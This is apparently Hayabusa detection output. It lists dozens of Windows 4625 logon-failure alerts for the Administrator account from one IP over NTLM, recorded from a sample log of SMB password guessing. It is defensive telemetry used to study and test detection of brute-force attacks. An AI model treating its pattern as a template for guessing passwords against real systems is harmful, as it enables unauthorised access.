2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCfhZDAH8ufk77zN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TE9pw4UeRldGeKVc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8PKE05MqxE5TwXT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GIE5fmddOPBbCM3u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pveyo4Czx6KWKCGn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zPyyHaRnBec7Qg2x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3b8mudJp5mdkiEW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Y6mjLaCzR28Q2qK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dMsNKWEjeCYYQVqw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I7c5fENhkwO6QfEU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cr1wAeMhPgVpwV82  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fErpp9Ww6LO37C9k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CYsNpBsGT5zOKe3p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgzUk1Dmttm4AQ3s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hp0c3YYyOSJuBHCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gkis4H1MIQPHUwqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lb6mH03qKLb8O7Dz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J10xEmhRNWfJ5FCI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Dujj8A7wwzAwzCp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NVDE3fIoUQfLn3cd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UlD48O0XpFUnuSmo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KyTPKuspADmLpv0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BdIAPiH32ZbmCgTK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1dEiN2xOA4E9Wl5p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fBeAez2fLjXB0dk3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gQ45aeMDc3Snabvv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWSYdr4lJlhCLMMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RgxHY7072aUCdfa0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9yKhEodJDTVCGdIG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z0odyPQmvkGRNWZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b5uRpG0fxCK75DPV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d9dcEzpJRW5YA8Bj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hv3B9bwB1YIaBa6N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lJf9Obml4aVxE5zp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mvnSOaRSkGU6Uf5q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JSAkZsZsv0SaLKaO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r6rnM6QbwfbbrcGy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RX0GW7K5wdQJUx4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xm7CpD5i735McsvS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bHxjZsnR25J47Ez8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1JWj91m79FyykH6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h9i0GncOzpz5REWp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BODZRJ6G3xxw29VJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJ2lq4piINfmI7Qe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NqDeXdOitJ3WY8w4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FnoHQf7QDxoI4tel  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FqkbgrtBa5VFxPry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TMD57GtY15bfWBre  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e3lT9UgWr82PcAjf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SpwhTfFlvvccnI5N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 10CfKdnvWf4UVuME  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YYLMax3okIqntHM1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qk9TPAK51EdVORwY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aVKRUnNu2nGslW7P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJ2AYRLcMbMVixg6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Sl9ucxM2Nu3xjNq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AFeBGB6qA7OaYV7l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KLUEKG9CzQYsH3Vp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vVZ44YKdRYY59zaC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: umU8pDDZFvvUVsHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nn7rA0uRegtHgaF1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2dgiakCKweT4GUGD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kptipiLujNVePYfy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: plaXJ1rEGpU3SzV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I4pALF2luLfg36GC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZLO4cufbFcRhRy8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a845OfrFKxy31Yhg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QnPM7uhs8y4BaP6I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7fW5FzQ4jbWDJxXc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: huKy3ruTPAlx94pI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g78Kx7hkMuUGIoX1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: erSXtXvMi8Cg1PWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
